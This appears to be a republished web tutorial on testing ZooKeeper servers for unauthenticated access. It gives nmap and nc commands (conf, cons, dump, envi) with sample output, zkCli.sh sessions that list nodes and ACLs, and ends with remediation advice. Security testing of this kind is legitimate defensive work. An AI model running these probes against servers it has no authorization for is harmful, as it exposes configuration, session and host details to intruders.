Zookeeper unauthorized access test problem
PrefaceZooKeeper is a distributed, open source distributed application coordination service. It is an open source implementation of Google's Chubby and an important component of Hadoop and Hbase. It is a software that provides consistency services for distributed applications. Its functions include: configuration maintenance, domain name services, distributed synchronization, group services, etc. Unauthorized access to Zookeeper means that no authentication is required by default after installation and deployment, which leads to remote exploitation of Zookeeper and a large amount of service-level information leakage. The default ports used are: 2181, 2182. Detect Zookeeper service openFor example, use nmap to detect whether a target address is running the Zookeeper service and detect whether port 2181 is open. root@kali:~# nmap -Pn -p 2181 xx.xx.xx.xx Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-21 01:56 EDT Nmap scan report for xx.xx.xx.xx.static.sz.js.chinamobile.com (xx.xx.xx.xx) Host is up (0.016s latency). PORT STATE SERVICE 2181/tcp open eforward Nmap done: 1 IP address (1 host up) scanned in 0.22 seconds Batch detection only requires modifying the corresponding target address. Get informationconf Command Output detailed information about related service configurations, including port, data path, log path, session timeout, maximum number of connections, etc. root@kali:~# echo conf | nc xx.xx.xx.xx 2181 clientPort=2171 dataDir=/opt/data/zookeeper/data/version-2 dataLogDir=/opt/data/zookeeper/data/version-2 tickTime=2000 maxClientCnxns=0 minSessionTimeout=4000 maxSessionTimeout=40000 serverId=0 cons Command Lists detailed information about all clients/sessions connected to the current server. root@kali:~# echo cons | nc xx.xx.xx.xx 2181 | more /10.23.46.40:11958[1](queued=0,recved=27317,sent=27317,sid=0x1000000e029b16e,lop=PING,est=1571277639586,to=40000,lcxid=0x33,lzxid=0x286a720,lresp=2435779043,llat=0,minlat=0,avglat=0,maxlat=397) /10.23.46.39:9688[1](queued=0,recved=27316,sent=27316,sid=0x1000000e029b17c,lop=PING,est=1571277641790,to=40000,lcxid=0x33,lzxid=0x286a71c,lresp=2435777895,llat=0,minlat=0,avglat=0,maxlat=560) dump Command Output unprocessed sessions and temporary nodes, leader node is valid. root@kali:~# echo dump | nc xx.xx.xx.xx 2181 | more SessionTracker dump: Session Sets (21): 0 expires at Thu Jan 29 12:38:08 CST 1970: 0 expires at Thu Jan 29 12:38:10 CST 1970: 3 expires at Thu Jan 29 12:38:12 CST 1970: 0x1000000e01f0013 0x1000000e029fdde 0x1000000e029fe05 2 expires at Thu Jan 29 12:38:14 CST 1970: 0x1000000e02a4235 0x1000000e01f00e9 31 expires at Thu Jan 29 12:38:16 CST 1970: 0x1000000e01f067a 0x1000000e02a423c 0x1000000e01f0008 0x1000000e029fdf4 ... Non-leader nodes cannot see any relevant information. envi Command Prints detailed information about the server. root@kali:~# echo envi | nc xx.xx.xx.xx 2181 Environment: zookeeper.version=3.4.13-2d71af4dbe22557fda74f9a9b4309b15a7487f03, built on 06/29/2018 04:05 GMT host.name=c1b69852-ac24-11e8-88d9-a4bf01306d06 java.version=1.7.0_80 java.vendor=Oracle Corporation java.home=/usr/java/jdk1.7.0_80/jre java.class.path=/opt/midware/zookeeper/bin/../build/classes:/opt/midware/zookeeper/bin/../build/lib/*.jar:/opt/midware/zookeeper/bin/../lib/slf4j-log4j12-1.7.25.jar:/opt/midware/zookeeper/bin/../lib/slf4j-api-1.7.25.jar:/opt/midware/zookeeper/bin/../lib/netty-3.10.6.Final.jar:/opt/midware/zookeeper/bin/../lib/log4j-1.2.17.jar:/opt/midware/zookeeper/bin/../lib/jline-0.9.94.jar:/opt/midware/zookeeper/bin/../lib/audience-annotations-0.5.0.jar:/opt/midware/zookeeper/bin/../zookeeper-3.4.13.jar:/opt/midware/zookeeper/bin/../src/java/lib/*.jar:/opt/midware/zookeeper/bin/../conf: java.library.path=/usr/java/packages/lib/amd64:/usr/lib64:/lib64:/lib:/usr/lib java.io.tmpdir=/tmp java.compiler=<NA> os.name=Linux os.arch=amd64 os.version=3.10.0-327.36.3.el7.x86_64 user.name=root user.home=/root user.dir=/ Connection TestInstallation Tools For example, in Kali, you can use the following command to install the zookeeper tool, and then you can use the client connection tool zkCli.sh. # apt-get install zookeeper ... #root@kali:~# cd /usr/share/zookeeper/bin/ #root@kali:/usr/share/zookeeper/bin# ls zkCleanup.sh zkCli.sh zkEnv.sh zkServer.sh Connection targetUse the -server parameter to specify the target to connect to. root@kali:/usr/share/zookeeper/bin# ./zkCli.sh -server xx.xx.xx.xx:2181 Connecting to xx.xx.xx.xx:2181 Welcome to ZooKeeper! JLine support is enabled [zk: xx.xx.xx.xx:2181(CONNECTING) 0] ... connected Get system related information root@kali:/usr/share/zookeeper/bin# ./zkCli.sh -server xx.xx.xx.xx:2181 Connecting to xx.xx.xx.xx:2181 Welcome to ZooKeeper! JLine support is enabled [zk: xx.xx.xx.xx:2181(CONNECTING) 0] WATCHER:: WatchedEvent state:SyncConnected type:None path:null [zk: xx.xx.xx.xx:2181(CONNECTED) 0] ls / [service, pms, DsMaster, Resource, monitor_lock, zookeeper] [zk: xx.xx.xx.xx:2181(CONNECTED) 1] get / cZxid = 0x0 ctime = Wed Dec 31 19:00:00 EST 1969 mZxid = 0x0 mtime = Wed Dec 31 19:00:00 EST 1969 pZxid = 0x4c0 cversion = 4 dataVersion = 0 aclVersion = 0 ephemeralOwner = 0x0 dataLength = 0 numChildren = 6 [zk: xx.xx.xx.xx:2181(CONNECTED) 2] get /service cZxid = 0x2 ctime = Thu Aug 30 02:58:40 EDT 2018 mZxid = 0x2 mtime = Thu Aug 30 02:58:40 EDT 2018 pZxid = 0x1cb884d cversion = 7 dataVersion = 0 aclVersion = 0 ephemeralOwner = 0x0 dataLength = 0 numChildren = 3 [zk: xx.xx.xx.xx:2181(CONNECTED) 3] getAcl / 'world,'anyone : cdrwa Repair plan1. Set up firewall policies to limit IP access [This solution is recommended] 2. Do not expose Zookeeper to the external network 3. Set up user authentication and ACL refer toZookeeper unauthorized access http://vic.pub/zookeeper-unauthorized-access/ Summarize The above is the Zookeeper unauthorized access test problem introduced by the editor. I hope it will be helpful to everyone. If you have any questions, please leave me a message and the editor will reply to you in time. I would also like to thank everyone for their support of the 123WORDPRESS.COM website! You may also be interested in:
|
<<: MySQL 8.0.15 installation and configuration method graphic tutorial under Windows
>>: Implementation of the login page of Vue actual combat record
Recommend
Detailed explanation of native Javascript inheritance methods and their advantages and disadvantages
Table of contents Preface Prototypal inheritance ...
Detailed explanation of Vuex environment
Table of contents Build Vuex environment Summariz...
Using CSS3 and JavaScript to develop web color picker example code
The web color picker function in this example use...
Detailed tutorial on Docker pulling Oracle 11g image configuration
Without further ado Start recording docker pullin...
Enter the style file for the automatic search suggestion function: suggestion.css
Copy code The code is as follows: .sugLayerDiv{ p...
Web interview Vue custom components and calling methods
Import: Due to project requirements, we will enca...
Design: A willful designer
<br />Years of professional art design educa...
How to implement Linux disk mounting, partitioning, and capacity expansion operations
Basic Concepts Before operation, you must first u...
HTML uses form tags to implement the registration page example code
Case Description: - Use tables to achieve page ef...
Graphic tutorial on configuring nginx file server in windows 10 system
Download the Windows version of Nginx from the Ng...
MySQL multi-table query detailed explanation
Eating well and getting enough rest sounds simple...
Detailed explanation of the principle and function of JavaScript closure
Table of contents Introduction Uses of closures C...
8 commands to effectively manage processes in Linux
Preface The role of process management: Determine...
MySQL 8.0.15 version installation tutorial connect to Navicat.list
The pitfalls 1. Many tutorials on the Internet wr...
HTML head tag detailed introduction
There are many tags and elements in the HTML head ...